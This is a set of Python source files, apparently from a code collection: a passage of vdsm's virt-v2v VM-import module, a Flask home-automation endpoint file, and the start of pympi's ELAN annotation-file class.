self._prepare_volumes()
try:
yield
finally:
self._teardown_volumes()
def _prepare_volumes(self):
if len(self._vminfo['disks']) < 1:
raise InvalidInputError('Job %r cannot import vm with no disk',
self._vmid)
for disk in self._vminfo['disks']:
drive = {'poolID': self._vminfo['poolID'],
'domainID': self._vminfo['domainID'],
'volumeID': disk['volumeID'],
'imageID': disk['imageID']}
res = self._irs.prepareImage(drive['domainID'],
drive['poolID'],
drive['imageID'],
drive['volumeID'])
if res['status']['code']:
raise VolumeError('Job %r bad volume specification: %s' %
(self._vmid, drive))
drive['path'] = res['path']
self._prepared_volumes.append(drive)
def _teardown_volumes(self):
for drive in self._prepared_volumes:
try:
self._irs.teardownImage(drive['domainID'],
drive['poolID'],
drive['imageID'])
except Exception as e:
logging.error('Job %r error tearing down drive: %s',
self._vmid, e)
def _get_storage_domain_path(self, path):
'''
prepareImage returns /prefix/sdUUID/images/imgUUID/volUUID
we need storage domain absolute path so we go up 3 levels
'''
return path.rsplit(os.sep, 3)[0]
def _environment(self):
# Provide some sane environment
env = os.environ.copy()
# virt-v2v specific variables
env['LIBGUESTFS_BACKEND'] = 'direct'
if 'virtio_iso_path' in self._vminfo:
env['VIRTIO_WIN'] = self._vminfo['virtio_iso_path']
return env
@contextmanager
def _password_file(self):
fd = os.open(self._passwd_file, os.O_WRONLY | os.O_CREAT, 0o600)
try:
if self._password.value is None:
os.write(fd, "")
else:
os.write(fd, self._password.value)
finally:
os.close(fd)
try:
yield
finally:
try:
os.remove(self._passwd_file)
except Exception:
logging.exception("Job %r error removing passwd file: %s",
self._vmid, self._passwd_file)
def _query_v2v_caps(self):
self._v2v_caps = frozenset()
p = _simple_exec_cmd([_VIRT_V2V.cmd, '--machine-readable'],
env=os.environ.copy(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with terminating(p):
try:
out, err = p.communicate()
except Exception:
logging.exception('Terminating virt-v2v process after error')
raise
if p.returncode != 0:
raise V2VProcessError(
'virt-v2v exited with code: %d, stderr: %r' %
(p.returncode, err))
self._v2v_caps = frozenset(out.splitlines())
logging.debug("Detected virt-v2v capabilities: %r", self._v2v_caps)
class LibvirtCommand(V2VCommand):
def __init__(self, uri, username, password, vminfo, vmid, irs):
super(LibvirtCommand, self).__init__(vminfo, vmid, irs)
self._uri = uri
self._username = username
self._password = password
def _command(self):
cmd = self._base_command
cmd.extend(['-ic', self._uri,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower()])
cmd.extend(self._disk_parameters())
cmd.extend(['--password-file',
self._passwd_file,
'--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path']),
self._vminfo['vmName']])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._password_file():
yield self._start_helper()
class OvaCommand(V2VCommand):
def __init__(self, ova_path, vminfo, vmid, irs):
super(OvaCommand, self).__init__(vminfo, vmid, irs)
self._ova_path = ova_path
def _command(self):
cmd = self._base_command
cmd.extend(['-i', 'ova', self._ova_path,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower(),
'--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path'])])
cmd.extend(self._disk_parameters())
return cmd
@contextmanager
def execute(self):
with self._volumes():
yield self._start_helper()
class XenCommand(V2VCommand):
"""
Importing Xen via virt-v2v require to use xen+ssh protocol.
this requires:
- enable the vdsm user in /etc/passwd
- generate ssh keys via ssh-keygen
- public key exchange with the importing hosts user
- host must be in ~/.ssh/known_hosts (done automatically
by ssh to the host before importing vm)
"""
def __init__(self, uri, vminfo, job_id, irs):
super(XenCommand, self).__init__(vminfo, job_id, irs)
self._uri = uri
self._ssh_agent = SSHAgent()
def _command(self):
cmd = self._base_command
cmd.extend(['-ic', self._uri,
'-o', 'vdsm',
'-of', self._get_disk_format(),
'-oa', self._vminfo.get('allocation', 'sparse').lower()])
cmd.extend(self._disk_parameters())
cmd.extend(['--vdsm-vm-uuid',
self._vmid,
'--vdsm-ovf-output',
_V2V_DIR,
'--machine-readable',
'-os',
self._get_storage_domain_path(
self._prepared_volumes[0]['path']),
self._vminfo['vmName']])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._ssh_agent:
yield self._start_helper()
def _environment(self):
env = super(XenCommand, self)._environment()
env.update(self._ssh_agent.auth)
return env
class KVMCommand(V2VCommand):
def __init__(self, uri, username, password, vminfo, vmid, irs):
super(KVMCommand, self).__init__(vminfo, vmid, irs)
self._uri = uri
self._username = username
self._password = password
def _command(self):
cmd = [EXT_KVM_2_OVIRT,
'--uri', self._uri]
if self._username is not None:
cmd.extend([
'--username', self._username,
'--password-file', self._passwd_file])
src, fmt = self._source_images()
cmd.append('--source')
cmd.extend(src)
cmd.append('--dest')
cmd.extend(self._dest_images())
cmd.append('--storage-type')
cmd.extend(fmt)
cmd.append('--vm-name')
cmd.append(self._vminfo['vmName'])
return cmd
@contextmanager
def execute(self):
with self._volumes(), self._password_file():
yield self._start_helper()
def _source_images(self):
con = libvirtconnection.open_connection(uri=self._uri,
username=self._username,
passwd=self._password)
with closing(con):
vm = con.lookupByName(self._vminfo['vmName'])
if vm:
params = {}
root = ET.fromstring(vm.XMLDesc(0))
_add_disks(root, params)
src = []
fmt = []
for disk in params['disks']:
if 'alias' in disk:
src.append(disk['alias'])
fmt.append(disk['disktype'])
return src, fmt
def _dest_images(self):
ret = []
for vol in self._prepared_volumes:
ret.append(vol['path'])
return ret
class PipelineProc(object):
def __init__(self, proc1, proc2):
self._procs = (proc1, proc2)
self._stdout = proc2.stdout
def kill(self):
"""
Kill all processes in a pipeline.
Some of the processes may have already terminated, but some may be
still running. Regular kill() raises OSError if the process has already
terminated. Since we are dealing with multiple processes, to avoid any
confusion we do not raise OSError at all.
"""
for p in self._procs:
logging.debug("Killing pid=%d", p.pid)
try:
p.kill()
except OSError as e:
# Probably the process has already terminated
if e.errno != errno.ESRCH:
raise e
@property
def pids(self):
return [p.pid for p in self._procs]
@property
def returncode(self):
"""
Returns None if any of the processes is still running. Returns 0 if all
processes have finished with a zero exit code, otherwise return first
nonzero exit code.
"""
ret = 0
for p in self._procs:
p.poll()
if p.returncode is None:
return None
if p.returncode != 0 and ret == 0:
# One of the processes has failed
ret = p.returncode
# All processes have finished
return ret
@property
def stdout(self):
return self._stdout
def wait(self, timeout=None):
if timeout is not None:
deadline = monotonic_time() + timeout
else:
deadline = None
for p in self._procs:
if deadline is not None:
# NOTE: CPopen doesn't support timeout argument.
while monotonic_time() < deadline:
p.poll()
if p.returncode is not None:
break
time.sleep(1)
else:
p.wait()
if deadline is not None:
if deadline < monotonic_time() or self.returncode is None:
# Timed out
return False
return True
class ImportVm(object):
TERM_DELAY = 30
PROC_WAIT_TIMEOUT = 30
def __init__(self, job_id, command):
self._id = job_id
self._command = command
self._thread = None
self._status = STATUS.STARTING
self._description = ''
self._disk_progress = 0
self._disk_count = 1
self._current_disk = 1
self._aborted = False
self._proc = None
def start(self):
self._thread = concurrent.thread(self._run, name="v2v/" + self._id[:8])
self._thread.start()
def wait(self):
if self._thread is not None and self._thread.is_alive():
self._thread.join()
@property
def id(self):
return self._id
@property
def status(self):
return self._status
@property
def description(self):
return self._description
@property
def progress(self):
'''
progress is part of multiple disk_progress its
flat and not 100% accurate - each disk take its
portion ie if we have 2 disks the first will take
0-50 and the second 50-100
'''
completed = (self._disk_count - 1) * 100
return (completed + self._disk_progress) / self._disk_count
@traceback(msg="Error importing vm")
def _run(self):
try:
self._import()
except Exception as ex:
if self._aborted:
logging.debug("Job %r was aborted", self._id)
else:
logging.exception("Job %r failed", self._id)
self._status = STATUS.FAILED
self._description = str(ex)
try:
if self._proc is not None:
self._abort()
except Exception as e:
logging.exception('Job %r, error trying to abort: %r',
self._id, e)
def _import(self):
logging.info('Job %r starting import', self._id)
with self._command.execute() as self._proc:
self._watch_process_output()
self._wait_for_process()
if self._proc.returncode != 0:
raise V2VProcessError('Job %r process failed exit-code: %r' %
(self._id,
self._proc.returncode))
if self._status != STATUS.ABORTED:
self._status = STATUS.DONE
logging.info('Job %r finished import successfully',
self._id)
def _wait_for_process(self):
if self._proc.returncode is not None:
return
logging.debug("Job %r waiting for virt-v2v process", self._id)
if not self._proc.wait(timeout=self.PROC_WAIT_TIMEOUT):
raise V2VProcessError("Job %r timeout waiting for process pid=%s",
self._id, self._proc.pids)
def _watch_process_output(self):
out = io.BufferedReader(io.FileIO(self._proc.stdout.fileno(),
mode='r', closefd=False), BUFFSIZE)
parser = OutputParser()
for event in parser.parse(out):
if isinstance(event, ImportProgress):
self._status = STATUS.COPYING_DISK
logging.info("Job %r copying disk %d/%d",
self._id, event.current_disk, event.disk_count)
self._disk_progress = 0
self._current_disk = event.current_disk
self._disk_count = event.disk_count
self._description = event.description
elif isinstance(event, DiskProgress):
self._disk_progress = event.progress
if event.progress % 10 == 0:
logging.info("Job %r copy disk %d progress %d/100",
self._id, self._current_disk, event.progress)
else:
raise RuntimeError("Job %r got unexpected parser event: %s" %
(self._id, event))
def abort(self):
self._status = STATUS.ABORTED
logging.info('Job %r aborting...', self._id)
self._abort()
def _abort(self):
self._aborted = True
if self._proc is None:
logging.warning(
'Ignoring request to abort job %r; the job failed to start',
self._id)
return
if self._proc.returncode is None:
logging.debug('Job %r killing virt-v2v process', self._id)
try:
self._proc.kill()
except OSError as e:
if e.errno != errno.ESRCH:
raise
logging.debug('Job %r virt-v2v process not running',
self._id)
else:
logging.debug('Job %r virt-v2v process was killed',
self._id)
finally:
for pid in self._proc.pids:
zombiereaper.autoReapPID(pid)
class OutputParser(object):
COPY_DISK_RE = re.compile(r'.*(Copying disk (\d+)/(\d+)).*')
DISK_PROGRESS_RE = re.compile(r'\s+\((\d+).*')
def parse(self, stream):
for line in stream:
if 'Copying disk' in line:
description, current_disk, disk_count = self._parse_line(line)
yield ImportProgress(int(current_disk), int(disk_count),
description)
for chunk in self._iter_progress(stream):
progress = self._parse_progress(chunk)
if progress is not None:
yield DiskProgress(progress)
if progress == 100:
break
def _parse_line(self, line):
m = self.COPY_DISK_RE.match(line)
if m is None:
raise OutputParserError('unexpected format in "Copying disk"'
', line: %r' % line)
return m.group(1), m.group(2), m.group(3)
def _iter_progress(self, stream):
chunk = ''
while True:
c = stream.read(1)
if not c:
raise OutputParserError('copy-disk stream closed unexpectedly')
chunk += c
if c == '\r':
yield chunk
chunk = ''
def _parse_progress(self, chunk):
m = self.DISK_PROGRESS_RE.match(chunk)
if m is None:
return None
try:
return int(m.group(1))
except ValueError:
raise OutputParserError('error parsing progress regex: %r'
% m.groups)
def _mem_to_mib(size, unit):
lunit = unit.lower()
if lunit in ('bytes', 'b'):
return size / 1024 / 1024
elif lunit in ('kib', 'k'):
return size / 1024
elif lunit in ('mib', 'm'):
return size
elif lunit in ('gib', 'g'):
return size * 1024
elif lunit in ('tib', 't'):
return size * 1024 * 1024
else:
raise InvalidVMConfiguration("Invalid currentMemory unit attribute:"
" %r" % unit)
def _list_domains(conn):
try:
for vm in conn.listAllDomains():
yield vm
# TODO: use only the new API (no need to fall back to listDefinedDomains)
# when supported in Xen under RHEL 5.x
except libvirt.libvirtError as e:
if e.get_error_code() != libvirt.VIR_ERR_NO_SUPPORT:
raise
# Support for old libvirt clients
seen = set()
for name in conn.listDefinedDomains():
try:
vm = conn.lookupByName(name)
except libvirt.libvirtError as e:
logging.error("Error looking up vm %r: %s", name, e)
else:
seen.add(name)
yield vm
for domainId in conn.listDomainsID():
try:
vm = conn.lookupByID(domainId)
except libvirt.libvirtError as e:
logging.error("Error looking up vm by id %r: %s", domainId, e)
else:
if vm.name() not in seen:
yield vm
def _add_vm(conn, vms, vm):
params = {}
try:
_add_vm_info(vm, params)
except libvirt.libvirtError as e:
logging.error("error getting domain information: %s", e)
return
try:
xml = vm.XMLDesc(0)
except libvirt.libvirtError as e:
logging.error("error getting domain xml for vm %r: %s",
vm.name(), e)
return
try:
root = ET.fromstring(xml)
except ET.ParseError as e:
logging.error('error parsing domain xml: %s', e)
return
if not _block_disk_supported(conn, root):
return
try:
_add_general_info(root, params)
except InvalidVMConfiguration as e:
logging.error("error adding general info: %s", e)
return
_add_snapshot_info(conn, vm, params)
_add_networks(root, params)
_add_disks(root, params)
_add_graphics(root, params)
_add_video(root, params)
disk_info = None
for disk in params['disks']:
disk_info = _get_disk_info(conn, disk, vm)
if disk_info is None:
break
disk.update(disk_info)
if disk_info is not None:
vms.append(params)
else:
logging.warning('Cannot add VM %s due to disk storage error',
vm.name())
def _block_disk_supported(conn, root):
'''
Currently we do not support importing VMs with block device from
Xen on Rhel 5.x
'''
if conn.getType() == 'Xen':
block_disks = root.findall('.//disk[@type="block"]')
block_disks = [d for d in block_disks
if d.attrib.get('device', None) == "disk"]
return len(block_disks) == 0
return True
def _add_vm_info(vm, params):
params['vmName'] = vm.name()
# TODO: use new API: vm.state()[0] == libvirt.VIR_DOMAIN_SHUTOFF
# when supported in Xen under RHEL 5.x
if vm.isActive():
params['status'] = "Up"
else:
params['status'] = "Down"
def _add_general_info(root, params):
e = root.find('./uuid')
if e is not None:
params['vmId'] = e.text
e = root.find('./currentMemory')
if e is not None:
try:
size = int(e.text)
except ValueError:
raise InvalidVMConfiguration("Invalid 'currentMemory' value: %r"
% e.text)
unit = e.get('unit', 'KiB')
params['memSize'] = _mem_to_mib(size, unit)
e = root.find('./vcpu')
if e is not None:
try:
params['smp'] = int(e.text)
except ValueError:
raise InvalidVMConfiguration("Invalid 'vcpu' value: %r" % e.text)
e = root.find('./os/type/[@arch]')
if e is not None:
params['arch'] = e.get('arch')
def _get_disk_info(conn, disk, vm):
if 'alias' in disk.keys():
try:
if disk['disktype'] == 'file':
vol = conn.storageVolLookupByPath(disk['alias'])
_, capacity, alloc = vol.info()
elif disk['disktype'] == 'block':
vol = vm.blockInfo(disk['alias'])
# We use the physical for allocation
# in blockInfo can report 0
capacity, _, alloc = vol
else:
logging.error('Unsupported disk type: %r', disk['disktype'])
except libvirt.libvirtError:
logging.exception("Error getting disk size")
return None
else:
return {'capacity': str(capacity), 'allocation': str(alloc)}
return {}
def _convert_disk_format(format):
# TODO: move to volume format when storage/volume.py
# will be accessible for /lib/vdsm/v2v.py
if format == 'qcow2':
return 'COW'
elif format == 'raw':
return 'RAW'
raise KeyError
def _add_disks(root, params):
params['disks'] = []
disks = root.findall('.//disk[@type="file"]')
disks = disks + root.findall('.//disk[@type="block"]')
for disk in disks:
d = {}
disktype = disk.get('type')
device = disk.get('device')
if device is not None:
if device == 'cdrom':
# Skip CD-ROM drives
continue
d['type'] = device
target = disk.find('./target/[@dev]')
if target is not None:
d['dev'] = target.get('dev')
if disktype == 'file':
d['disktype'] = 'file'
source = disk.find('./source/[@file]')
if source is not None:
d['alias'] = source.get('file')
elif disktype == 'block':
d['disktype'] = 'block'
source = disk.find('./source/[@dev]')
if source is not None:
d['alias'] = source.get('dev')
else:
logging.error('Unsupported disk type: %r', type)
driver = disk.find('./driver/[@type]')
if driver is not None:
try:
d["format"] = _convert_disk_format(driver.get('type'))
except KeyError:
logging.warning("Disk %s has unsupported format: %r", d,
format)
params['disks'].append(d)
def _add_graphics(root, params):
e = root.find('./devices/graphics/[@type]')
if e is not None:
params['graphics'] = e.get('type')
def _add_video(root, params):
e = root.find('./devices/video/model/[@type]')
if e is not None:
params['video'] = e.get('type')
def _add_networks(root, params):
params['networks'] = []
interfaces = root.findall('.//interface')
for iface in interfaces:
i = {}
if 'type' in iface.attrib:
i['type'] = iface.attrib['type']
mac = iface.find('./mac/[@address]')
if mac is not None:
i['macAddr'] = mac.get('address')
source = iface.find('./source/[@bridge]')
if source is not None:
i['bridge'] = source.get('bridge')
target = iface.find('./target/[@dev]')
if target is not None:
i['dev'] = target.get('dev')
model = iface.find('./model/[@type]')
if model is not None:
i['model'] = model.get('type')
params['networks'].append(i)
def _add_snapshot_info(conn, vm, params):
# Snapshot related API is not yet implemented in the libvirt's Xen driver
if conn.getType() == 'Xen':
return
try:
ret = vm.hasCurrentSnapshot()
except libvirt.libvirtError:
logging.exception('Error checking for existing snapshots.')
else:
params['has_snapshots'] = ret > 0
def _vm_has_snapshot(vm):
try:
return vm.hasCurrentSnapshot() == 1
except libvirt.libvirtError:
logging.exception('Error checking if snapshot exist for vm: %s.',
vm.name())
return False
def _read_ovf_from_ova(ova_path):
"""
virt-v2v support ova in tar, zip formats as well as
extracted directory
"""
if os.path.isdir(ova_path):
return _read_ovf_from_ova_dir(ova_path)
elif zipfile.is_zipfile(ova_path):
return _read_ovf_from_zip_ova(ova_path)
elif tarfile.is_tarfile(ova_path):
return _read_ovf_from_tar_ova(ova_path)
raise ClientError('Unknown ova format, supported formats:'
' tar, zip or a directory')
def _find_ovf(entries):
for entry in entries:
if '.ovf' == os.path.splitext(entry)[1].lower():
return entry
return None
def _read_ovf_from_ova_dir(ova_path):
files = os.listdir(ova_path)
name = _find_ovf(files)
if name is not None:
with open(os.path.join(ova_path, name), 'r') as ovf_file:
return ovf_file.read()
raise ClientError('OVA directory %s does not contain ovf file' % ova_path)
def _read_ovf_from_zip_ova(ova_path):
with open(ova_path, 'rb') as fh:
zf = zipfile.ZipFile(fh)
name = _find_ovf(zf.namelist())
if name is not None:
return zf.read(name)
raise ClientError('OVA does not contains file with .ovf suffix')
def _read_ovf_from_tar_ova(ova_path):
with tarfile.open(ova_path) as tar:
for member in tar:
if member.name.endswith('.ovf'):
with closing(tar.extractfile(member)) as ovf:
return ovf.read()
raise ClientError('OVA does not contains file with .ovf suffix')
def _add_general_ovf_info(vm, node, ns, ova_path):
vm['status'] = 'Down'
vmName = node.find('./ovf:VirtualSystem/ovf:Name', ns)
if vmName is not None:
vm['vmName'] = vmName.text
else:
vm['vmName'] = os.path.splitext(os.path.basename(ova_path))[0]
memSize = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
'rasd:VirtualQuantity' % _OVF_RESOURCE_MEMORY, ns)
if memSize is not None:
vm['memSize'] = int(memSize.text)
else:
raise V2VError('Error parsing ovf information: no memory size')
smp = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
'rasd:VirtualQuantity' % _OVF_RESOURCE_CPU, ns)
if smp is not None:
vm['smp'] = int(smp.text)
else:
raise V2VError('Error parsing ovf information: no cpu info')
def _get_max_disk_size(populated_size, size):
if populated_size is None:
return size
if size is None:
return populated_size
return str(max(int(populated_size), int(size)))
def _parse_allocation_units(units):
"""
Parse allocation units of the form "bytes * x * y^z"
The format is defined in:
DSP0004: Common Information Model (CIM) Infrastructure,
ANNEX C.1 Programmatic Units
We conform only to the subset of the format specification and
base-units must be bytes.
"""
# Format description
sp = '[ \t\n]?'
base_unit = 'byte'
operator = '[*]' # we support only multiplication
number = '[+]?[0-9]+' # we support only positive integers
exponent = '[+]?[0-9]+' # we support only positive integers
modifier1 = '(?P<m1>{op}{sp}(?P<m1_num>{num}))'.format(
op=operator,
num=number,
sp=sp)
modifier2 = \
'(?P<m2>{op}{sp}' \
'(?P<m2_base>[0-9]+){sp}\^{sp}(?P<m2_exp>{exp}))'.format(
op=operator,
exp=exponent,
sp=sp)
r = '^{base_unit}({sp}{mod1})?({sp}{mod2})?$'.format(
base_unit=base_unit,
mod1=modifier1,
mod2=modifier2,
sp=sp)
m = re.match(r, units, re.MULTILINE)
if m is None:
raise V2VError('Failed to parse allocation units: %r' % units)
g = m.groupdict()
ret = 1
if g['m1'] is not None:
try:
ret *= int(g['m1_num'])
except ValueError:
raise V2VError("Failed to parse allocation units: %r" % units)
if g['m2'] is not None:
try:
ret *= pow(int(g['m2_base']), int(g['m2_exp']))
except ValueError:
raise V2VError("Failed to parse allocation units: %r" % units)
return ret
def _add_disks_ovf_info(vm, node, ns):
vm['disks'] = []
for d in node.findall(".//ovf:DiskSection/ovf:Disk", ns):
disk = {'type': 'disk'}
capacity = int(d.attrib.get('{%s}capacity' % _OVF_NS))
if '{%s}capacityAllocationUnits' % _OVF_NS in d.attrib:
units = d.attrib.get('{%s}capacityAllocationUnits' % _OVF_NS)
capacity *= _parse_allocation_units(units)
disk['capacity'] = str(capacity)
fileref = d.attrib.get('{%s}fileRef' % _OVF_NS)
alias = node.find('.//ovf:References/ovf:File[@ovf:id="%s"]' %
fileref, ns)
if alias is not None:
disk['alias'] = alias.attrib.get('{%s}href' % _OVF_NS)
populated_size = d.attrib.get('{%s}populatedSize' % _OVF_NS, None)
size = alias.attrib.get('{%s}size' % _OVF_NS)
disk['allocation'] = _get_max_disk_size(populated_size, size)
else:
raise V2VError('Error parsing ovf information: disk href info')
vm['disks'].append(disk)
def _add_networks_ovf_info(vm, node, ns):
vm['networks'] = []
for n in node.findall('.//ovf:Item[rasd:ResourceType="%d"]'
% _OVF_RESOURCE_NETWORK, ns):
net = {}
dev = n.find('./rasd:ElementName', ns)
if dev is not None:
net['dev'] = dev.text
else:
raise V2VError('Error parsing ovf information: '
'network element name')
model = n.find('./rasd:ResourceSubType', ns)
if model is not None:
net['model'] = model.text
else:
raise V2VError('Error parsing ovf information: network model')
bridge = n.find('./rasd:Connection', ns)
if bridge is not None:
net['bridge'] = bridge.text
net['type'] = 'bridge'
else:
net['type'] = 'interface'
vm['networks'].append(net)
def _simple_exec_cmd(command, env=None, nice=None, ioclass=None,
stdin=None, stdout=None, stderr=None):
command = wrap_command(command, with_ioclass=ioclass,
ioclassdata=None, with_nice=nice,
with_setsid=False, with_sudo=False,
reset_cpu_affinity=True)
logging.debug(cmdutils.command_log_line(command, cwd=None))
p = CPopen(command, close_fds=True, cwd=None, env=env,
stdin=stdin, stdout=stdout, stderr=stderr)
return p
|
igrlas/CentralHub
|
CHPackage/src/centralhub/server/home_endpoints.py
|
# Endpoints for user to control the home.
from datetime import datetime
from flask import Blueprint, jsonify, request
from services import elements_services, home_services
home_api = Blueprint('/home_api', __name__)
elements_services = elements_services.ElementsServices()
home_services = home_services.HomeServices()
@home_api.route('/profiles')
def profiles():
"""Gets all profiles for all elements for user application to display and manipulate elements"""
return jsonify(home_services.get_profiles())
@home_api.route('/element', methods=['POST'])
def update_element():
"""Updates single element with all new values received from the user application"""
received_element = request.get_json()
home_services.update_element(received_element)
return 'OK'
@home_api.route('/elements', methods=['POST'])
def update_elements():
"""Updates all elements with all new values received from the user application"""
received_elements = request.get_json()
home_services.update_elements(received_elements)
return 'OK'
@home_api.route('/elementdelete', methods=['POST'])
def delete_element():
"""Deletes a single element with given hid"""
element = request.get_json()
home_services.delete_element(element['hid'])
return 'OK'
@home_api.route('/timerules', methods=['POST'])
def timerules():
"""Adds, Updates or deletes time rule for the given element"""
rules = request.get_json()
if len(rules) == 0:
raise Exception("No elements in the list")
for rule in rules:
if 'id' not in rule:
rule['id'] = None
home_services.save_time_rules(rules)
return 'OK'
@home_api.route('/timerules/<string:hid>')
def get_timerules(hid):
"""Gets list of timerules for given hid"""
timerules= home_services.read_time_rules(hid)
return jsonify(timerules)
|
acuriel/Nixtla
|
nixtla/core/tools/pympi/Elan.py
|
# -*- coding: utf-8 -*-
import time
import EafIO
import warnings
class Eaf:
"""Read and write Elan's Eaf files.
.. note:: All times are in milliseconds and can't have decimals.
:var dict annotation_document: Annotation document TAG entries.
:var dict licences: Licences included in the file.
:var dict header: XML header.
:var list media_descriptors: Linked files, where every file is of the
form: ``{attrib}``.
:var list properties: Properties, where every property is of the form:
``(value, {attrib})``.
:var list linked_file_descriptors: Secondary linked files, where every
linked file is of the form:
``{attrib}``.
:var dict timeslots: Timeslot data of the form:
``{TimslotID -> time(ms)}``.
:var dict tiers: Tier data of the form:
``{tier_name -> (aligned_annotations,
reference_annotations, attributes, ordinal)}``,
aligned_annotations of the form:
``[{annotation_id ->
(begin_ts, end_ts, value, svg_ref)}]``,
reference annotations of the form:
``[{annotation_id ->
(reference, value, previous, svg_ref)}]``.
:var list linguistic_types: Linguistic types, where every type is of the
form: ``{id -> attrib}``.
:var list locales: Locales, where every locale is of the form:
``{attrib}``.
:var dict constraints: Constraint data of the form:
``{stereotype -> description}``.
:var dict controlled_vocabularies: Controlled vocabulary data of the
form: ``{id ->
(descriptions, entries, ext_ref)}``,
descriptions of the form:
``[(lang_ref, text)]``,
entries of the form:
``{id -> (values, ext_ref)}``,
values of the form:
``[(lang_ref, description, text)]``.
:var list external_refs: External references, where every reference is of
the form ``[id, type, value]``.
:var list lexicon_refs: Lexicon references, where every reference is of
the form: ``[{attribs}]``.
"""
def __init__(self, file_path=None, author='pympi'):
"""Construct either a new Eaf file or read on from a file/stream.
:param str file_path: Path to read from, - for stdin. If ``None`` an
empty Eaf file will be created.
:param str author: Author of the file.
"""
self.naive_gen_ann, self.naive_gen_ts = False, False
self.annotation_document = {
'AUTHOR': author,
'DATE': time.strftime("%Y-%m-%dT%H:%M:%S%z"),
'VERSION': '2.8',
'FORMAT': '2.8',
'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
'xsi:noNamespaceSchemaLocation':
'http://www.mpi.nl/tools/elan/EAFv2.8.xsd'}
self.constraints = {}
self.controlled_vocabularies = {}
self.header = {}
self.licences = {}
self.linguistic_types = {}
self.tiers = {}
self.timeslots = {}
self.external_refs = []
self.lexicon_refs = []
self.linked_file_descriptors = []
self.locales = []
self.media_descriptors = []
self.properties = []
self.new_time, self.new_ann = 0, 0
if file_path is None:
self.add_linguistic_type('default-lt', None)
self.constraints = {'Time_Subdivision': 'Time subdivision of paren'
't annotation\'s time interval, no time gaps a'
'llowed within this interval',
'Symbolic_Subdivision': 'Symbolic subdivision '
'of a parent annotation. Annotations refering '
'to the same parent are ordered',
'Symbolic_Association': '1-1 association with '
'a parent annotation',
'Included_In': 'Time alignable annotations wit'
'hin the parent annotation\'s time interval, g'
'aps are allowed'}
self.properties.append(('0', {'NAME': 'lastUsedAnnotation'}))
self.add_tier('default')
else:
EafIO.parse_eaf(file_path, self)
def to_file(self, file_path, pretty=True):
"""Write the object to a file, if the file already exists a backup will
be created with the ``.bak`` suffix.
:param str file_path: Path to write to, - for stdout.
:param bool pretty: Flag for pretty XML printing.
"""
EafIO.to_eaf(file_path, self, pretty)
def to_textgrid(self, excluded_tiers=[], included_tiers=[]):
"""Convert the object to a :class:`pympi.Praat.TextGrid` object.
:param list excluded_tiers: Specifically exclude these tiers.
:param list included_tiers: Only include this tiers, when empty all are
included.
:returns: :class:`pympi.Praat.TextGrid` object
:raises ImportError: If the pympi.Praat module can't be loaded.
"""
from Praat import TextGrid
tgout = TextGrid()
tiers = [a for a in self.tiers if a not in excluded_tiers]
if included_tiers:
tiers = [a for a in tiers if a in included_tiers]
for tier in tiers:
currentTier = tgout.add_tier(tier)
for interval in self.get_annotation_data_for_tier(tier):
if interval[0] == interval[1]:
continue
currentTier.add_interval(interval[0]/1000.0,
interval[1]/1000.0, interval[2])
return tgout
def extract(self, start, end):
"""Extracts the selected time frame as a new object.
:param int start: Start time.
:param int end: End time.
:returns: The extracted frame in a new object.
"""
from copy import deepcopy
eaf_out = deepcopy(self)
for tier in eaf_out.tiers.itervalues():
rems = []
for ann in tier[0]:
if eaf_out.timeslots[tier[0][ann][1]] > end or\
eaf_out.timeslots[tier[0][ann][0]] < start:
rems.append(ann)
for r in rems:
del tier[0][r]
return eaf_out
def get_linked_files(self):
"""Give all linked files."""
return self.media_descriptors
def add_linked_file(self, file_path, relpath=None, mimetype=None,
time_origin=None, ex_from=None):
"""Add a linked file.
:param str file_path: Path of the file.
:param str relpath: Relative path of the file.
:param str mimetype: Mimetype of the file, if ``None`` it tries to
guess it according to the file extension which
currently only works for wav, mpg, mpeg and xml.
:param int time_origin: Time origin for the media file.
:param str ex_from: Extracted from field.
:raises KeyError: If mimetype had to be guessed and a non standard
extension or an unknown mimetype.
"""
if mimetype is None:
mimes = {'wav': 'audio/x-wav', 'mpg': 'video/mpeg',
'mpeg': 'video/mpg', 'xml': 'text/xml'}
mimetype = mimes[file_path.split('.')[-1]]
self.media_descriptors.append({
'MEDIA_URL': file_path, 'RELATIVE_MEDIA_URL': relpath,
'MIME_TYPE': mimetype, 'TIME_ORIGIN': time_origin,
'EXTRACTED_FROM': ex_from})
def copy_tier(self, eaf_obj, tier_name):
"""Copies a tier to another :class:`pympi.Elan.Eaf` object.
:param pympi.Elan.Eaf eaf_obj: Target Eaf object.
:param str tier_name: Name of the tier.
:raises KeyError: If the tier doesn't exist.
"""
eaf_obj.remove_tier(tier_name)
eaf_obj.add_tier(tier_name, tier_dict=self.tiers[tier_name][3])
for ann in self.get_annotation_data_for_tier(tier_name):
eaf_obj.insert_annotation(tier_name, ann[0], ann[1], ann[2])
def add_tier(self, tier_id, ling='default-lt', parent=None, locale=None,
part=None, ann=None, tier_dict=None):
"""Add a tier.
:param str tier_id: Name of the tier.
:param str ling: Linguistic type, if the type is not available it will
warn and pick the first available type.
:param str parent: Parent tier name.
:param str locale: Locale.
:param str part: Participant.
:param str ann: Annotator.
:param dict tier_dict: TAG attributes, when this is not ``None`` it
will ignore all other options.
"""
if ling not in self.linguistic_types:
warnings.warn(
'add_tier: Linguistic type non existent, choosing the first')
ling = self.linguistic_types.keys()[0]
if tier_dict is None:
self.tiers[tier_id] = ({}, {}, {
'TIER_ID': tier_id,
'LINGUISTIC_TYPE_REF': ling,
'PARENT_REF': parent,
'PARTICIPANT': part,
'DEFAULT_LOCALE': locale,
'ANNOTATOR': ann}, len(self.tiers))
else:
self.tiers[tier_id] = ({}, {}, tier_dict, len(self.tiers))
def remove_tiers(self, tiers):
"""Remove multiple tiers, note that this is a lot faster then removing
them individually because of the delayed cleaning of timeslots.
